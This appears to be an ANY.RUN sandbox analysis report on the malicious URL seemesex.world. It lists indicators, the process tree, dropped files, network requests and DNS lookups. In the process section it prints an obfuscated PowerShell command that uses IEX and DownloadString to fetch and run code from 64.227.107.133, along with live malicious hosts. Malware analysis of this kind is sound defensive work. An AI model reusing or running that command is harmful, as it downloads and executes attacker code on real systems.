analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://seemesex.world

Full analysis: https://app.any.run/tasks/6ed3b407-889f-4165-bd04-4a9f73b46dee
Verdict: Malicious activity
Analysis date: May 30, 2020, 16:30:38
OS: Windows 10 Professional (build: 16299, 64 bit)
Indicators:
MD5:

3451C5CCAC21B0F1A09D6C59CADDD504

SHA1:

0BC6234D36BC005358BA6C8385716E381722EC24

SHA256:

A00BB74C9EDC1DC54DEE348975C5AA1E6C3734864CA39D6DC3CD5825EDC1DB5F

SSDEEP:

3:N1KNAAIA88:CSAC8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts Visual C# compiler

      • PowerShell.exe (PID: 800)

  • SUSPICIOUS

    • Connects to server without host name

      • IEXPLORE.EXE (PID: 4168)

    • Executed via COM

      • FlashUtil_ActiveX.exe (PID: 1836)

    • Executes PowerShell scripts

      • IEXPLORE.EXE (PID: 4168)

    • Reads the machine GUID from the registry

      • PowerShell.exe (PID: 800)
      • csc.exe (PID: 200)

  • INFO

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 4168)

    • Reads the machine GUID from the registry

      • IEXPLORE.EXE (PID: 4168)
      • iexplore.exe (PID: 3680)

    • Changes internet zones settings

      • iexplore.exe (PID: 3680)

    • Creates files in the user directory

      • FlashUtil_ActiveX.exe (PID: 1836)

    • Reads the software policy settings

      • PowerShell.exe (PID: 800)

    • Reads settings of System Certificates

      • PowerShell.exe (PID: 800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
91
Monitored processes
7
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe flashutil_activex.exe no specs powershell.exe conhost.exe no specs csc.exe no specs cvtres.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3680"C:\Program Files\internet explorer\iexplore.exe" "http://seemesex.world"C:\Program Files\internet explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
11.00.16299.15 (WinBuild.160101.0800)
4168"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3680 CREDAT:9474 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
11.00.16299.15 (WinBuild.160101.0800)
1836"C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe" -EmbeddingC:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Utility
Version:
29,0,0,171
800((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>IEX (New-Object Net.WebClient).DownloadString('http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187');"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
IEXPLORE.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
3580\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exePowerShell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
200"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exePowerShell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.7.2556.0 built by: NET471REL1
484C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
12.00.52519.0 built by: VSWINSERVICING
Total events
6 416
Read events
3 302
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
800PowerShell.exeC:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_xokpeyd5.hui.ps1
MD5:
SHA256:
800PowerShell.exeC:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_1yqjz34a.nw4.psm1
MD5:
SHA256:
200csc.exeC:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP
MD5:
SHA256:
484cvtres.exeC:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp
MD5:
SHA256:
200csc.exeC:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.dll
MD5:
SHA256:
200csc.exeC:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.out
MD5:
SHA256:
3680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\UrlBlock\URL46D7.tmp
MD5:
SHA256:
4168IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\FZ4P8RAN\10105_jokiest_Couldn[1].jstext
MD5:F836C010B14CBA02592A81B59BDC4976
SHA256:39078DE84082E083DE45C60334A78513F1ECB25BED11B326E22545591C9C44D6
3680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZSVOB39W\iecompatviewlist[1].xmlxml
MD5:AD288DEDE9F96BA9BF5928EEBB84F430
SHA256:11EE91F9612C0EEC7C2E218DBCC2566549BACED502669054B56DA7837D891D9C
4168IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\LD57I5PR\pervades_8497_11925[1].htmhtml
MD5:914D2CEEC2AB02A814C0E680545F9F7A
SHA256:1F3B1F4B0A6FAFF6063ED8BB82A8FF11D78ED4BBE76EFF237743AE75AC853C86
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
17
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4168
IEXPLORE.EXE
GET
302
148.251.72.21:80
http://seemesex.world/
DE
malicious
800
PowerShell.exe
GET
64.227.107.133:80
http://64.227.107.133/12018-Gaveling/9KSzP?aVVc=2797
US
suspicious
3680
iexplore.exe
GET
404
64.227.107.133:80
http://64.227.107.133/favicon.ico
US
suspicious
4168
IEXPLORE.EXE
GET
302
94.130.90.228:80
http://atztds547.xyz/xn94r2398us2938u4s
DE
suspicious
800
PowerShell.exe
GET
200
64.227.107.133:80
http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187
US
text
2.08 Kb
suspicious
4168
IEXPLORE.EXE
GET
200
64.227.107.133:80
http://64.227.107.133/1966_04_15/Trinkums/pervades_8497_11925
US
html
4.90 Kb
suspicious
4168
IEXPLORE.EXE
POST
200
64.227.107.133:80
http://64.227.107.133/computing-Deperm/agkZId
US
text
9.88 Kb
suspicious
4168
IEXPLORE.EXE
GET
200
64.227.107.133:80
http://64.227.107.133/795X/10105_jokiest_Couldn?gjMJD=Fumeuse_Ankusha_mislays
US
text
28.2 Kb
suspicious
4168
IEXPLORE.EXE
POST
200
64.227.107.133:80
http://64.227.107.133/1989-05-27/Demarcate/W0p6/13110_5680?Chaliced=zxHq
US
text
7.21 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3680
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
4276
svchost.exe
20.191.48.196:443
settings-win-ppe.data.microsoft.com
Microsoft Corporation
US
unknown
4168
IEXPLORE.EXE
148.251.72.21:80
seemesex.world
Hetzner Online GmbH
DE
suspicious
800
PowerShell.exe
64.227.107.133:80
Peer 1 Network (USA) Inc.
US
suspicious
4168
IEXPLORE.EXE
64.227.107.133:80
Peer 1 Network (USA) Inc.
US
suspicious
4168
IEXPLORE.EXE
94.130.90.228:80
atztds547.xyz
Hetzner Online GmbH
DE
malicious
3680
iexplore.exe
13.80.7.77:443
urs.microsoft.com
Microsoft Corporation
NL
unknown
3680
iexplore.exe
64.227.107.133:80
Peer 1 Network (USA) Inc.
US
suspicious
4168
IEXPLORE.EXE
13.80.7.77:443
urs.microsoft.com
Microsoft Corporation
NL
unknown

DNS requests

Domain
IP
Reputation
seemesex.world
  • 148.251.72.21
malicious
atztds547.xyz
  • 94.130.90.228
suspicious
urs.microsoft.com
  • 13.80.7.77
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
c.urs.microsoft.com
  • 13.80.7.77
whitelisted
ieonline.microsoft.com
  • 204.79.197.200
whitelisted
nexusrules.officeapps.live.com
  • 52.109.12.18
whitelisted
self.events.data.microsoft.com
  • 52.114.158.91
whitelisted
settings-win-ppe.data.microsoft.com
  • 20.191.48.196
whitelisted
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Observed DNS Query to .world TLD
4168
IEXPLORE.EXE
Potentially Bad Traffic
ET INFO HTTP Request to Suspicious *.world Domain
4168
IEXPLORE.EXE
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://seemesex.world